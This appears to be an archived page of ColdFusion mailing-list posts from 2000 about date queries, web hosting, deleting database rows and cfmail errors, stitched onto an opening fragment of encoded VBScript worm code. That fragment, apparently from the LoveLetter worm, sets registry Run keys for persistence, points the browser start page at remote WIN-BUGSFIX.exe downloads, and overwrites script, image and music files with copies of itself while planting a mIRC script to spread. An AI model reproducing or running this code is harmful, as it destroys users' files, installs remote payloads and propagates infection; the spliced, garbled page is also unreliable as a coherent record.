l32",dirsystem&"\MSKernel32.vbs"=0Dregcreate =
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices=
\Win32DLL",dirwin&"\Win32DLL.vbs"=0Ddownread=3D""=0Ddownread=3Dregget("HK=
EY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download =
Directory")=0Dif (downread=3D"") then=0Ddownread=3D"c:\"=0Dend if=0Dif =
(fileexist(dirsystem&"\WinFAT32.exe")=3D1) then=0DRandomize=0Dnum =3D =
Int((4 * Rnd) + 1)=0Dif num =3D 1 then=0Dregcreate =
"HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmh=
Pnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"=0Delseif num =3D 2 =
then=0Dregcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwe=
rWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"=0Delseif num =3D 3 =
then=0Dregcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQ=
ZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"=0Delseif num =3D 4 then=0Dregcreate =
"HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDG=
jkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-B=
UGSFIX.exe"=0Dend if=0Dend if=0Dif =
(fileexist(downread&"\WIN-BUGSFIX.exe")=3D0) then=0Dregcreate =
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUG=
SFIX",downread&"\WIN-BUGSFIX.exe"=0Dregcreate =
"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start =
Page","about:blank"=0Dend if=0Dend sub=0Dsub listadriv=0DOn Error Resume =
Next=0DDim d,dc,s=0DSet dc =3D fso.Drives=0DFor Each d in dc=0DIf =
d.DriveType =3D 2 or d.DriveType=3D3 Then=0Dfolderlist(d.path&"\")=0Dend =
if=0DNext=0Dlistadriv =3D s=0Dend sub=0Dsub infectfiles(folderspec)  =
=0DOn Error Resume Next=0Ddim f,f1,fc,ext,ap,mircfname,s,bname,mp3=0Dset =
f =3D fso.GetFolder(folderspec)=0Dset fc =3D f.Files=0Dfor each f1 in =
fc=0Dext=3Dfso.GetExtensionName(f1.path)=0Dext=3Dlcase(ext)=0Ds=3Dlcase(f=
1.name)=0Dif (ext=3D"vbs") or (ext=3D"vbe") then=0Dset =
ap=3Dfso.OpenTextFile(f1.path,2,true)=0Dap.write =
vbscopy=0Dap.close=0Delseif(ext=3D"js") or (ext=3D"jse") or =
(ext=3D"css") or (ext=3D"wsh") or (ext=3D"sct") or (ext=3D"hta") =
then=0Dset ap=3Dfso.OpenTextFile(f1.path,2,true)=0Dap.write =
vbscopy=0Dap.close=0Dbname=3Dfso.GetBaseName(f1.path)=0Dset =
cop=3Dfso.GetFile(f1.path)=0Dcop.copy(folderspec&"\"&bname&".vbs")=0Dfso.=
DeleteFile(f1.path)=0Delseif(ext=3D"jpg") or (ext=3D"jpeg") then=0Dset =
ap=3Dfso.OpenTextFile(f1.path,2,true)=0Dap.write =
vbscopy=0Dap.close=0Dset =
cop=3Dfso.GetFile(f1.path)=0Dcop.copy(f1.path&".vbs")=0Dfso.DeleteFile(f1=
.path)=0Delseif(ext=3D"mp3") or (ext=3D"mp2") then=0Dset =
mp3=3Dfso.CreateTextFile(f1.path&".vbs")=0Dmp3.write =
vbscopy=0Dmp3.close=0Dset =
att=3Dfso.GetFile(f1.path)=0Datt.attributes=3Datt.attributes+2=0Dend =
if=0Dif (eq<>folderspec) then=0Dif (s=3D"mirc32.exe") or =
(s=3D"mlink32.exe") or (s=3D"mirc.ini") or (s=3D"script.ini") or =
(s=3D"mirc.hlp") then=0Dset =
scriptini=3Dfso.CreateTextFile(folderspec&"\script.ini")=0Dscriptini.Writ=
eLine "[script]"=0Dscriptini.Wri

RE: Working with dates

2000-05-02 Thread Tim Bahlke

I want to be able to search my DB by anything added since mm/dd/ date.
So, I am hoping I can say in my query ... WHERE
Personal.DateEntered>=04/28/2000, for example.

Is this possible?

----
Tim Bahlke
Graphica
www.thinkcreate.com
P: 336.230.0575
F: 336.230.0083




--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Working with dates

2000-05-02 Thread Tim Bahlke

In reference to dates (mm/dd/), is 05/02/2000 considered greater then
04/30/2000 in CF?

Thanks


Tim Bahlke
Graphica
www.thinkcreate.com
P: 336.230.0575
F: 336.230.0083



--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: need domain hosting

2000-05-01 Thread Tim Bahlke

Stay far away from WebHosting.com!!!


Tim Bahlke
Graphica
www.thinkcreate.com
P: 336.230.0575
F: 336.230.0083

-Original Message-
From: cfm [mailto:[EMAIL PROTECTED]]
Sent: Saturday, April 29, 2000 12:28 PM
To: [EMAIL PROTECTED]
Subject: need domain hosting

Hi all,

we have this discussion every week or so, so I thought I would bring it
back up.

Here are my needs:
Cold Fusion 4.0+
Unlimited email - IMAIL or equivalent
100 to 200 megs
5 to 20 gig throughout (unlimited would be great but not necessary)
allow multiple domains to point to same IP address

Here is what I want to pay:
15 to 20 per month per domain.  I currently have 4 domains I would like
to transfer.


Now why i need this..
I have been using DigitalChainsaw for about 2 years and they have been
very reliable until the last month where I have been down on 3 of the 4
weekends this month.

You can respond to me directly of you wish @ [EMAIL PROTECTED]

Thanks,

Bill Kaigler





--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.


--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Deleting Data

2000-04-20 Thread Tim Bahlke

I am trying to create a page where a user can delete their data from the DB.
I have created a CFQUERY with a DELETE statement.

When I try to perform the function I get a page that reads 405 Method Not
Allowed.

Am I missing something with my CF Server settings?

Thanks


Tim



--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



cfmail error

2000-04-17 Thread Tim Bahlke

I am getting the following error message when I try to use cfmail.  Can
someone share with me what his means?
unknown exception condition
TagCFMail::sendMessage
Thanks
Tim




--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



  1   2   >